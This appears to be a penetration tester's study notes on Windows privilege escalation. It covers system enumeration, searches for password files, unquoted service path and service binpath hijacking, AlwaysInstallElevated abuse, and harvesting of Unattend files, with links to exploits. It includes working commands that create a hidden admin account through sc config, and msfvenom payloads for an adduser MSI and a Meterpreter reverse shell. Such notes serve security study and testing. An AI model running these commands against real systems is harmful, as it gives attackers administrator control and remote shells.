+++
title = "Privilege Escalation on Windows"
date = 2022-05-04
page_template = "page.html"

[extra]
ogham = "᚛ᚄᚈᚏᚓᚐᚋᚔᚅᚌ ᚈᚓᚏᚐᚁᚔᚈᚄ ᚑᚃ ᚏᚓᚐᚂᚈᚔᚋᚓ ᚇᚐᚈᚐ ᚈᚑ ᚈᚓᚅ ᚇᚔᚃᚃᚓᚏᚓᚅᚈ ᚌᚐᚏᚐᚌᚓᚄ ᚔᚄ ᚆᚐᚏᚇ᚜"
+++


#### Gather System Information

* `systeminfo`
* `systeminfo | findstr /B /C:"OS NAME" /C:"OS Version"` - check OS version
* `netstat -ano` - check active network connections
* `netsh firewall show state` - firewall settings
* `netsh firewall show config`
* `schtasks /query /fo LIST /v` - check scheduled tasks
* `tasklist /SVC` - running processes linked to services
* `net start` - running processes
* `DRIVERQUERY` - installed drivers
* `wmic qfe get Caption,Description,HotFixID,InstalledOn`
* `dir /s *password*` - searches for files the contain 'password' in the filename.
* `findstr /si password *.txt` - Searches for 'password' in `.txt` files.
* `icacls [Directory]` - check what permissions we have in a directory.
  * `icacls` (*Integrity Control Access Control Lists*)
  * See also: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

This vulnerability arises from the way Windows interprets a file path for *Windows service* binaries. File paths containing spaces should be double quoted to avoid file confusion.

To the best of my knowledge, there is no downside to quoting file paths so just always do it.

To exploit:

1. A service with an "unquoted" binary path that includes space(s).
1. Write permissions for the folder containing spaces.
1. A way to reboot the system or service in order to execute the payload.

The following command can be run to list vulnerable service binaries which boot automatically at startup:

````cmd
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
````

Alternatively, we can query a service directly:

````cmd
sc qc [service name]
````


Similar to *unquoted service path* vulnerability, we may be modify the binary service path of a service and point it to a payload.

To exploit:

1. Need permissions to modify the service path for a given service.

A popular tool to check for these permissions is `accesschk.exe`.

````cmd
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
````

Exploiting *Service Binary* path to add a new user and grant administrator rights:

````cmd

sc config [service name] binpath= "net user admin password /add"
sc stop [service name]
sc start [service name]
sc config [service name] binpath= "net localgroup Administrators admin /add"
sc stop [service name]
sc start [service name]]
````

Available as a [Metasploit](../../000%20Zettelkasten/Metasploit.md) module: `exploit/windows/local/service_permissions`.


*AlwaysInstallElevated* is a Windows setting that allows non-privileged users to install Microsoft Windows Installer Package Files (*MSI*) with elevated system permissions.

We can use this feature to execute a malicious MSI installer package with admin permissions.

##### To exploit:

We need two registry entries to have been set to `1`:

````cmd
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
````

We can generate a payload with *MSFVenom*:

````shell
msfvenom -p windows/adduser USER=admin PASS=password -f msi -o filename.msi
````

Or alternatively, a *reverse shell*:

````shell
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi
````

To execute the payload:

````cmd
msiexec /quiet /qn /i C:\Users\filename.msi
````

* `/quiet` - bypasses UAC
* `/qn` - do not use GUI
* `/i`  - Perform a regular installation

Available as a [Metasploit](../../000%20Zettelkasten/Metasploit.md) module in `exploit/windows/local/always_install_elevated`.


This is a feature which allows Windows to be deployed without active intervention from an administrator. 

When an administrator fails to clean up such an install, an XML file called "Unattend" is list on the local system. This file is a goldmine for attackers.

Unattend files are likely found in:

* `C:\Windows\Panther\`
* `C:\Windows\Panther\Unattend\`
* `C:\Windows\System32\`
* `C:\Windows\System32\sysprep\`

Common Filenames:

* `Unattend.xml`
* `Unattended.xml`
* `Unattend.txt`
* `sysprep.xml`
* `sysprep.inf`

Note: Passwords in these files may be *base64* encoded.


`exploit/windows/local/bypassuac` is a *Metasploit Module* that bypasses Uaser Access Control (*UAC*).

User Access Control (*UAC*) is a security feature on Windows that allows an administrator to have two separate access tokens; a standard user, and an admin access token.

When admin access is required the system prompts the user for approval to execute the program with the admin access token.

The Metasploit Module uses a trusted *Windows Publisher Certificate* to spawn a second shell with UAC turned off and will work on both x86 and x64 platforms.


* **Windows Exploit Suggester**
  * https://github.com/GDSSecurity/Windows-Exploit-Suggester
  * Compares the output of `systeminfo` and compares the target's patch versions against the latest version of the Microsoft vulnerability database.
  * **Note:** The database this tool relies on went EOL in March 2017.

````cmd
wmic qfe list full > hotfixes.txt
systeminfo > sysinfo.txt
````

````Shell
python windows-exploit-suggester.py --database <current-date>.xls --systeminfo sysinfo.txt --hotfixes hotfixes.txt
````

* **Windows Privilege Escalation Awesome Script (*WinPEAS*)**
  * https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
  * winPEAS.exe - requires .NET framework 4.
  * winPEAS.bat - all other versions of Windows.
* **PowerSploit**
  * https://github.com/PowerShellMafia/PowerSploit/
* **PowerTools**
  * https://github.com/PowerShellEmpire/PowerTools/


* *CVE-2010-4398*
  * https://www.exploit-db.com/exploits/15609/
* *MS16-016*
  * https://www.exploit-db.com/exploits/39432/
  * https://www.exploit-db.com/exploits/39788/
* *MS16-014*
  * https://www.exploit-db.com/exploits/40039/
* *MS16-032*
  * https://www.exploit-db.com/exploits/39719/
* *CVE-2017-0213*
  * https://www.exploit-db.com/exploits/42020/
* *CVE-2019-1253*
  * https://github.com/padovah4ck/CVE-2019-1253
* *CVE-2019-0836*
  * https://www.exploit-db.com/exploits/46718
  * https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0836
  * https://www.rapid7.com/db/vulnerabilities/msft-cve-2019-0836
